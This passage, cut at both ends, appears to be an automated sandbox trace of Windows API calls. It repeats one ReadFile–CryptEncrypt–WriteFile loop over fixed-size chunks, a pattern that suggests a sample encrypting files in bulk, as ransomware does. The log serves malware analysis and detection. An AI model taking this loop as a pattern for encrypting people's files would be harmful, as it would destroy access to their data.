pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.504] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.504] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.504] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.504] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.505] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.505] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.505] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.505] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.505] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.506] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.506] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.506] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.506] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.506] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.507] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.507] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.507] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.507] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.507] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.508] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.508] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.508] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.508] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.508] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.508] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.509] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.509] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.510] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.510] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.511] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.511] ReadFile (in: hFile=0x5d3c, 